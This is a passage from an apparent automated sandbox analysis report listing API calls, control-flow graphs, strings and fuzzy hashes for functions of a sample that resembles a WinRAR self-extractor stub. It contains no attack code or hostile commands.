        • GetFileAttributesW.KERNEL32(?,?,00154DEC,00000800), ref: 00131FF1
          • Part of subcall function 00131B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00131B4F
          • Part of subcall function 00131B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00130633,Crypt32.dll,00000000,001306AD,00000200,?,00130690,00000000,00000000,?), ref: 00131B71
        • _swprintf.LIBCMT ref: 00132063
        • _swprintf.LIBCMT ref: 001320AF
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
        • AllocConsole.KERNEL32 ref: 001320B7
        • GetCurrentProcessId.KERNEL32 ref: 001320C1
        • AttachConsole.KERNEL32(00000000), ref: 001320C8
        • _wcslen.LIBCMT ref: 001320DD
        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 001320EE
        • WriteConsoleW.KERNEL32(00000000), ref: 001320F5
        • Sleep.KERNEL32(00002710), ref: 00132100
        • FreeConsole.KERNEL32 ref: 00132106
        • ExitProcess.KERNEL32 ref: 0013210E
        Memory Dump Source and IDA snapshot: as listed for the first function above.
        Similarity
        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
        • API String ID: 1207345701-3298887752
        • Opcode ID: 1e82267e54da6dc10a7b8714718c65a19911d5a0a6aae89fca0d3e1b9903a4ea
        • Instruction ID: 0c994f83650e5ea5701beb12576c42fbcbb38b29cf8e18173503f47131233d76
        • Opcode Fuzzy Hash: 1e82267e54da6dc10a7b8714718c65a19911d5a0a6aae89fca0d3e1b9903a4ea
        • Instruction Fuzzy Hash: B1D184B1008784EBD7319F50D959BDFBAE9FB8430AF50091DFAA5AE150C7B4858CCB92
        APIs
        • __EH_prolog.LIBCMT ref: 0012ED90
        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0012EDCC
          • Part of subcall function 0012D6A7: _wcslen.LIBCMT ref: 0012D6AF
          • Part of subcall function 00131900: _wcslen.LIBCMT ref: 00131906
          • Part of subcall function 00132EC2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0012CF18,00000000,?,?), ref: 00132EDE
        • _wcslen.LIBCMT ref: 0012F109
        • __fprintf_l.LIBCMT ref: 0012F23C
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
        • API String ID: 566448164-801612888
        • Opcode ID: 03469e37e95a5578af774e53d51c37bb19898a1d7fb9f28c55d5cc6c47902f4d
        • Instruction ID: 5d144276915f8bfa117c74b60e22607d423a4fc0cf7bf27c9f0a59886ae01a49
        • Opcode Fuzzy Hash: 03469e37e95a5578af774e53d51c37bb19898a1d7fb9f28c55d5cc6c47902f4d
        • Instruction Fuzzy Hash: E632E071900228EBDF28EF68E841AEA77B4FF18704F40057EF90697291E7719DA6CB54

        Control-flow Graph
        control_flow_graph 658 13aee5-13af13 ShowWindow call 13ac14 661 13af15-13af1d call 145209 658->661 662 13af1e-13af23 658->662 661->662 664 13af25-13af27 662->664 665 13af29-13af32 call 148a08 662->665 668 13af33-13af3b 664->668 665->668 670 13af41-13af4a call 148a08 668->670 671 13af3d-13af3f 668->671 672 13af4b-13af75 GetWindowRect GetParent MapWindowPoints 670->672 671->672 675 13af80-13afc9 GetParent CreateWindowExW 672->675 676 13af77-13af7a DestroyWindow 672->676 677 13afcb-13afce 675->677 678 13b008-13b00a 675->678 676->675 677->678 681 13afd0-13afd2 677->681 679 13b01e-13b024 678->679 680 13b00c-13b018 ShowWindow UpdateWindow 678->680 680->679 681->679 682 13afd4-13afd7 681->682 682->679 683 13afd9-13afdc 682->683 683->679 684 13afde-13afec call 13ad0e 683->684 684->679 687 13afee-13b006 ShowWindow SetWindowTextW call 145209 684->687 687->679
        APIs
        • ShowWindow.USER32(?,00000000), ref: 0013AEFE
          • Part of subcall function 0013AC14: LoadCursorW.USER32(00000000,00007F00), ref: 0013AC4B
          • Part of subcall function 0013AC14: RegisterClassExW.USER32(00000030), ref: 0013AC6C
        • GetWindowRect.USER32(?,?), ref: 0013AF54
        • GetParent.USER32(?), ref: 0013AF62
        • MapWindowPoints.USER32(00000000,00000000), ref: 0013AF6B
        • DestroyWindow.USER32(00000000), ref: 0013AF7A
        • GetParent.USER32(?), ref: 0013AF97
        • CreateWindowExW.USER32(00000000,RarHtmlClassName,00000000,40000000,?,?,?,?,00000000), ref: 0013AFBB
        • ShowWindow.USER32(?,00000005,00000000), ref: 0013AFF1
        • SetWindowTextW.USER32(?,00000000), ref: 0013AFF9
        • ShowWindow.USER32(00000000,00000005), ref: 0013B00F
        • UpdateWindow.USER32(00000000), ref: 0013B018
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Window$Show$Parent$ClassCreateCursorDestroyLoadPointsRectRegisterTextUpdate
        • String ID: RarHtmlClassName
        • API String ID: 3841971108-1658105358
        • Opcode ID: e1fbe9bd05e78d821e08b2d1e3b4f9e4cf95307879af12c74e0f8ebf9f65e675
        • Instruction ID: 689d3f5336b5cee443cd8fa883a8ea794a31872ad09ad89f01a13bdfaf95b375
        • Opcode Fuzzy Hash: e1fbe9bd05e78d821e08b2d1e3b4f9e4cf95307879af12c74e0f8ebf9f65e675
        • Instruction Fuzzy Hash: 5141CF71008208EFCB259F60DC8DB6F7FA9EF08701F144559F9899A062EB70D944CB66

        Control-flow Graph

        APIs
          • Part of subcall function 0013C748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0013C759
          • Part of subcall function 0013C748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0013C76A
          • Part of subcall function 0013C748: IsDialogMessageW.USER32(00010424,?), ref: 0013C77E
          • Part of subcall function 0013C748: TranslateMessage.USER32(?), ref: 0013C78C
          • Part of subcall function 0013C748: DispatchMessageW.USER32(?), ref: 0013C796
        • GetDlgItem.USER32(00000068,00181CF0), ref: 0013E61B
        • ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,0013C999,001560F0,00181CF0,00181CF0,00001000,?,00000000,?), ref: 0013E643
        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0013E64E
        • SendMessageW.USER32(00000000,000000C2,00000000,001545F4), ref: 0013E65C
        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0013E672
        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0013E68C
        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0013E6D0
        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0013E6DE
        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0013E6ED
        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0013E714
        • SendMessageW.USER32(00000000,000000C2,00000000,0015549C), ref: 0013E723
          • Part of subcall function 0013A235: DestroyWindow.USER32(?,00000000,0013E640,?,?,00000001,?,?,0013C999,001560F0,00181CF0,00181CF0,00001000,?,00000000,?), ref: 0013A241
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Message$Send$Window$CallbackDestroyDialogDispatchDispatcherItemPeekShowTranslateUser
        • String ID: \
        • API String ID: 3039329835-2967466578
        • Opcode ID: 7a600e38a4ccd51d90d0c366d707b5c20ed2d1fc1675372ca76fe0e4dd94b201
        • Instruction ID: e10cd5f0a89f6b57d0514f015c53e1eeb6b043f84e061482e663cbac75ba9855
        • Opcode Fuzzy Hash: 7a600e38a4ccd51d90d0c366d707b5c20ed2d1fc1675372ca76fe0e4dd94b201
        • Instruction Fuzzy Hash: 8431E171185B40BFD301DF209C0EFAB3FADFF42B04F440908F5A1A6190C7A54A488BA6

        Control-flow Graph
        control_flow_graph 725 14bb0b-14bb24 726 14bb26-14bb36 call 1500fc 725->726 727 14bb3a-14bb3f 725->727 726->727 734 14bb38 726->734 729 14bb41-14bb49 727->729 730 14bb4c-14bb70 MultiByteToWideChar 727->730 729->730 732 14bb76-14bb82 730->732 733 14bd03-14bd16 call 140d6c 730->733 735 14bb84-14bb95 732->735 736 14bbd6 732->736 734->727 739 14bbb4-14bbc5 call 14a7ee 735->739 740 14bb97-14bba6 call 1531c0 735->740 738 14bbd8-14bbda 736->738 742 14bbe0-14bbf3 MultiByteToWideChar 738->742 743 14bcf8 738->743 739->743 753 14bbcb 739->753 740->743 752 14bbac-14bbb2 740->752 742->743 746 14bbf9-14bc0b call 14c11c 742->746 747 14bcfa-14bd01 call 14bd73 743->747 755 14bc10-14bc14 746->755 747->733 754 14bbd1-14bbd4 752->754 753->754 754->738 755->743 757 14bc1a-14bc21 755->757 758 14bc23-14bc28 757->758 759 14bc5b-14bc67 757->759 758->747 760 14bc2e-14bc30 758->760 761 14bcb3 759->761 762 14bc69-14bc7a 759->762 760->743 765 14bc36-14bc50 call 14c11c 760->765 766 14bcb5-14bcb7 761->766 763 14bc95-14bca6 call 14a7ee 762->763 764 14bc7c-14bc8b call 1531c0 762->764 770 14bcf1-14bcf7 call 14bd73 763->770 779 14bca8 763->779 764->770 777 14bc8d-14bc93 764->777 765->747 780 14bc56 765->780 766->770 771 14bcb9-14bcd2 call 14c11c 766->771 770->743 771->770 783 14bcd4-14bcdb 771->783 782 14bcae-14bcb1 777->782 779->782 780->743 782->766 784 14bd17-14bd1d 783->784 785 14bcdd-14bcde 783->785 786 14bcdf-14bcef WideCharToMultiByte 784->786 785->786 786->770 787 14bd1f-14bd26 call 14bd73 786->787 787->747
        APIs
        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00146993,00146993,?,?,?,0014BD5C,00000001,00000001,62E85006), ref: 0014BB65
        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0014BD5C,00000001,00000001,62E85006,?,?,?), ref: 0014BBEB
        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0014BCE5
        • __freea.LIBCMT ref: 0014BCF2
          • Part of subcall function 0014A7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0014DBDC,00000000,?,001480A1,?,00000008,?,0014A861,?,?,?), ref: 0014A820
        • __freea.LIBCMT ref: 0014BCFB
        • __freea.LIBCMT ref: 0014BD20
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ByteCharMultiWide__freea$AllocateHeap
        • String ID:
        • API String ID: 1414292761-0
        • Opcode ID: 5aa50522b704c5e63c9a6aafba6f976059b5bd8f528748a7bcc469b81b97e806
        • Instruction ID: 400dce5f92088de6fa179eed6d9df24537827cb561285102e616565c165b80ff
        • Opcode Fuzzy Hash: 5aa50522b704c5e63c9a6aafba6f976059b5bd8f528748a7bcc469b81b97e806
        • Instruction Fuzzy Hash: D551F172604216ABDB258F64CCC2EBF77A9EB54750F254668FC14DB1A0EF34DC80C690

        Control-flow Graph
        control_flow_graph 790 13bbb0-13bbcf GetClassNameW 791 13bbd1-13bbe6 call 133306 790->791 792 13bbf7-13bbf9 790->792 797 13bbf6 791->797 798 13bbe8-13bbf4 FindWindowExW 791->798 794 13bc04-13bc06 792->794 795 13bbfb-13bbfd 792->795 795->794 797->792 798->797
        APIs
        • GetClassNameW.USER32(?,?,00000050), ref: 0013BBC7
        • SHAutoComplete.SHLWAPI(?,00000010), ref: 0013BBFE
          • Part of subcall function 00133306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,0012D523,00000000,.exe,?,?,00000800,?,?,?,00139E4C), ref: 0013331C
        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0013BBEE
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AutoClassCompareCompleteFindNameStringWindow
        • String ID: @UJu$EDIT
        • API String ID: 4243998846-1013725496
        • Opcode ID: 5ae77079d9a29680c17f25f190ce4e0b8378e149ed8884f1c869e07544256985
        • Instruction ID: ea588412cd20dca2e42c86ad0201d5849c72d4afc6cd74437573140df9c637ca
        • Opcode Fuzzy Hash: 5ae77079d9a29680c17f25f190ce4e0b8378e149ed8884f1c869e07544256985
        • Instruction Fuzzy Hash: C8F08232604628BBDB3056259C09F9FBA6CEB46B40F440051BA01B6184EB60EA45C6BA

        Control-flow Graph
        control_flow_graph 799 12ab40-12ab61 call 13ffc0 802 12ab63-12ab66 799->802 803 12ab6c 799->803 802->803 804 12ab68-12ab6a 802->804 805 12ab6e-12ab7f 803->805 804->805 806 12ab81 805->806 807 12ab87-12ab91 805->807 806->807 808 12ab93 807->808 809 12ab96-12aba3 call 1279e5 807->809 808->809 812 12aba5 809->812 813 12abab-12abca CreateFileW 809->813 812->813 814 12ac1b-12ac1f 813->814 815 12abcc-12abee GetLastError call 12cf32 813->815 817 12ac23-12ac26 814->817 819 12ac28-12ac2d 815->819 821 12abf0-12ac13 CreateFileW GetLastError 815->821 817->819 820 12ac39-12ac3e 817->820 819->820 822 12ac2f 819->822 823 12ac40-12ac43 820->823 824 12ac5f-12ac70 820->824 821->817 827 12ac15-12ac19 821->827 822->820 823->824 828 12ac45-12ac59 SetFileTime 823->828 825 12ac72-12ac8a call 131928 824->825 826 12ac8e-12ac99 824->826 825->826 827->817 828->824
        APIs
        • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00128243,?,00000005,?,00000011), ref: 0012ABBF
        • GetLastError.KERNEL32(?,?,00128243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0012ABCC
        • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00128243,?,00000005,?), ref: 0012AC02
        • GetLastError.KERNEL32(?,?,00128243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0012AC0A
        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00128243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0012AC59
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: File$CreateErrorLast$Time
        • String ID:
        • API String ID: 1999340476-0
        • Opcode ID: 16fedeb8fb357680bd9ef4f044c7ad9a8bab4fd0cd64ed9f64704fa94c1160ec
        • Instruction ID: ec61dbad41a57f2acac5506fc792c281246d71ce09e5d204ca2e8eb9bb7620ae
        • Opcode Fuzzy Hash: 16fedeb8fb357680bd9ef4f044c7ad9a8bab4fd0cd64ed9f64704fa94c1160ec
        • Instruction Fuzzy Hash: 893166305447A1AFE7309F24EC45BDABBD4BF01324F600B19FAA0961D1C3B0A8A4CB92

        Control-flow Graph

        APIs
          • Part of subcall function 001324DF: ResetEvent.KERNEL32(?), ref: 001324F1
          • Part of subcall function 001324DF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00132505
        • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0013223A
        • CloseHandle.KERNEL32(?,?), ref: 00132254
        • DeleteCriticalSection.KERNEL32(?), ref: 0013226D
        • CloseHandle.KERNEL32(?), ref: 00132279
        • CloseHandle.KERNEL32(?), ref: 00132285
          • Part of subcall function 001322FC: WaitForSingleObject.KERNEL32(?,000000FF,00132516,?), ref: 00132302
          • Part of subcall function 001322FC: GetLastError.KERNEL32(?), ref: 0013230E
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
        • String ID:
        • API String ID: 1868215902-0
        • Opcode ID: 3ebbf83d7ff0a714e6bec5c1e791874cdc6efc7a2a475a49106100d0425a57ad
        • Instruction ID: 2b8b1209e505c349972a4fdbe649231ede06353a39268e2b85bfebb7819b79f1
        • Opcode Fuzzy Hash: 3ebbf83d7ff0a714e6bec5c1e791874cdc6efc7a2a475a49106100d0425a57ad
        • Instruction Fuzzy Hash: FD018472400744EFC732AF64DC85BC6BBA9FB08715F100929F26A525A0CB757A94DB90

        Control-flow Graph
        control_flow_graph 866 13c748-13c761 PeekMessageW 867 13c763-13c777 KiUserCallbackDispatcher 866->867 868 13c79c-13c79e 866->868 869 13c779-13c786 IsDialogMessageW 867->869 870 13c788-13c796 TranslateMessage DispatchMessageW 867->870 869->868 869->870 870->868
        APIs
        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0013C759
        • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0013C76A
        • IsDialogMessageW.USER32(00010424,?), ref: 0013C77E
        • TranslateMessage.USER32(?), ref: 0013C78C
        • DispatchMessageW.USER32(?), ref: 0013C796
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Message$CallbackDialogDispatchDispatcherPeekTranslateUser
        • String ID:
        • API String ID: 3531142305-0
        • Opcode ID: 44d1074cf950a72e965437171aa0b973774afe94c6bb63e21617cf6458af6286
        • Instruction ID: 64f01645660fe7e28d790657b815bc9103be1bd41426379c677856a1c3e40ed5
        • Opcode Fuzzy Hash: 44d1074cf950a72e965437171aa0b973774afe94c6bb63e21617cf6458af6286
        • Instruction Fuzzy Hash: BDF0D071901619ABCF209BB1DC4CDDB7F7CEF05391B404415B906E2450E764D645CBF0

        Control-flow Graph

        APIs
          • Part of subcall function 00131B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00131B4F
          • Part of subcall function 00131B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00130633,Crypt32.dll,00000000,001306AD,00000200,?,00130690,00000000,00000000,?), ref: 00131B71
        • OleInitialize.OLE32(00000000), ref: 0013BD24
        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0013BD5B
        • SHGetMalloc.SHELL32(0016A460), ref: 0013BD65
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
        • String ID: riched20.dll
        • API String ID: 3498096277-3360196438
        • Opcode ID: a9bb05db861f2e8d52eae4499db5fb58515ab060260c3df754ef5ef2f27184b7
        • Instruction ID: 4b5e5db75afc4ff7b9f9724625f23ac4f0787cc771ee9f237bcd9fb137eed080
        • Opcode Fuzzy Hash: a9bb05db861f2e8d52eae4499db5fb58515ab060260c3df754ef5ef2f27184b7
        • Instruction Fuzzy Hash: CBF049B1C00209ABCB10AF99CC499EFFFFCEF94304F00401AE810A2240DBB456458BA1

        Control-flow Graph
        control_flow_graph 875 13ed1e-13ed52 call 13ffc0 SetEnvironmentVariableW call 131697 880 13ed76-13ed78 875->880 881 13ed54-13ed58 875->881 882 13ed61-13ed68 call 1317b3 881->882 885 13ed5a-13ed60 882->885 886 13ed6a-13ed70 SetEnvironmentVariableW 882->886 885->882 886->880
        APIs
        • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0013ED34
        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0013ED70
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: EnvironmentVariable
        • String ID: sfxcmd$sfxpar
        • API String ID: 1431749950-3493335439
        • Opcode ID: 7104179b8add53191e4bbc7f739772dd8be850104f1543569c0cfae0da36f034
        • Instruction ID: e838cbf3d60b25763136ffc972bd9d4d778142b9b117fc8be4e18e7bf06f3e7e
        • Opcode Fuzzy Hash: 7104179b8add53191e4bbc7f739772dd8be850104f1543569c0cfae0da36f034
        • Instruction Fuzzy Hash: 7BF030B2800734E7DB212BD08C46ABA7BA8AF65B86F444155BD859A092E77098C0CAA0

        Control-flow Graph
        control_flow_graph 887 144d92-144da7 LoadLibraryExW 888 144da9-144db2 GetLastError 887->888 889 144ddb-144ddc 887->889 890 144db4-144dc8 call 147458 888->890 891 144dd9 888->891 890->891 894 144dca-144dd8 LoadLibraryExW 890->894 891->889
        APIs
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00144D43,00000000,?,001840C4,?,?,?,00144EE6,00000004,InitializeCriticalSectionEx,00157424,InitializeCriticalSectionEx), ref: 00144D9F
        • GetLastError.KERNEL32(?,00144D43,00000000,?,001840C4,?,?,?,00144EE6,00000004,InitializeCriticalSectionEx,00157424,InitializeCriticalSectionEx,00000000,?,00144C9D), ref: 00144DA9
        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00144DD1
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
